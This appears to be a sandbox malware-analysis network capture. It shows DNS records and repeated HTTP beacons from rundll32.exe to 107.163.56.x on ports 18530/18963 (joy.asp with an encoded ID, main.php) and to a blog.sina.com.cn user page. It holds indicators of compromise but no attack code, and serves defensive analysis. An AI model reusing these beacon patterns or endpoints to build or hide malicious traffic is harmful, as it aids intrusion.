Dec 19, 2024 15:44:18.897058010 CET | 1.1.1.1 | 192.168.2.11 | 0xf60c | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 15:44:18.897058010 CET | 1.1.1.1 | 192.168.2.11 | 0xf60c | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 15:44:43.177288055 CET | 1.1.1.1 | 192.168.2.11 | 0xa47c | No error (0) | blog.sina.com.cn | blogx.sina.com.cn | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 15:44:43.177288055 CET | 1.1.1.1 | 192.168.2.11 | 0xa47c | No error (0) | blogx.sina.com.cn | - | 116.133.8.92 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 15:46:21.533853054 CET | 1.1.1.1 | 192.168.2.11 | 0x57ec | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 15:46:21.533853054 CET | 1.1.1.1 | 192.168.2.11 | 0x57ec | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false

• blog.sina.com.cn
• 107.163.56.231:18530
• 107.163.56.110:18530
• 107.163.56.232:18963
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.1149705107.163.56.231185301232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:11.584388971 CET170OUTGET //joy.asp?sid=rungnejcndvgnJLgFe5vteX8v2LUicbtudb8mtiWote1mdC@ HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible)
                                                                                                                                                                        Host: 107.163.56.231:18530
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        1192.168.2.1149706107.163.56.110185301232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:11.584470034 CET185OUTGET /u1129.html HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.110:18530
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.1149722107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:39.858464003 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.1149723107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:39.861032009 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.1149726116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:43.298105001 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        5192.168.2.1149728107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:43.856717110 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        6192.168.2.1149729116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:43.971196890 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:44:45.672321081 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:44:45 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        7192.168.2.1149730107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:43.972687006 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.1149733107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:48.035053015 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        9192.168.2.1149734107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:48.378560066 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        10192.168.2.1149736116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:49.684655905 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        11192.168.2.1149737107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:51.861542940 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        12192.168.2.1149738107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:44:51.993258953 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.11 | 49739 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:44:51.993359089 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.11 | 49740 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:44:55.998133898 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.11 | 49741 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:44:56.164062023 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.11 | 49742 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:44:56.164269924 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:44:57.873430967 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:44:57 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.11 | 49746 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:00.123146057 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.11 | 49747 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:00.240134954 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.11 | 49748 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:00.256176949 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:45:02.036578894 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:45:01 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.11 | 49750 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:04.122564077 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.11 | 49751 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:04.235218048 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.11 | 49752 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:04.236861944 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:45:05.974081039 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:45:05 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.11 | 49754 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:08.148576021 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.11 | 49755 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:08.251167059 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.11 | 49756 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:08.251693964 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:45:09.958744049 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:45:09 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.11 | 49758 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:12.139372110 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.11 | 49759 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:12.260761976 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
28          192.168.2.11  49760        116.133.8.92    80                1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:12.264594078 CET  118                OUT
Data:
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:14.117769003 CET  371                IN
Data:
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:45:13 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
29          192.168.2.11  49762        107.163.56.232  18963             1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:16.153583050 CET  183                OUT
Data:
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
30          192.168.2.11  49763        107.163.56.232  18963             1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:16.264883041 CET  183                OUT
Data:
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
31          192.168.2.11  49764        116.133.8.92    80                1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:16.267159939 CET  118                OUT
Data:
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
32          192.168.2.11  49765        107.163.56.232  18963             1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:20.171262026 CET  183                OUT
Data:
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
33          192.168.2.11  49766        116.133.8.92    80                1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:20.300904036 CET  118                OUT
Data:
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:22.017090082 CET  371                IN
Data:
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:45:21 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
34          192.168.2.11  49767        107.163.56.232  18963             1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:20.312871933 CET  183                OUT
Data:
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
35          192.168.2.11  49771        107.163.56.232  18963             1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:24.294791937 CET  183                OUT
Data:
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
36          192.168.2.11  49772        107.163.56.232  18963             1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:24.481132984 CET  183                OUT
Data:
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
37          192.168.2.11  49773        116.133.8.92    80                1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:24.481162071 CET  118                OUT
Data:
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:26.194787025 CET  371                IN
Data:
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:45:25 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
38          192.168.2.11  49775        107.163.56.232  18963             1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:28.420633078 CET  183                OUT
Data:
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
39          192.168.2.11  49776        107.163.56.232  18963             1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:28.541662931 CET  183                OUT
Data:
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
40          192.168.2.11  49777        116.133.8.92    80                1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:28.586559057 CET  118                OUT
Data:
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:30.985765934 CET  371                IN
Data:
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:45:30 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
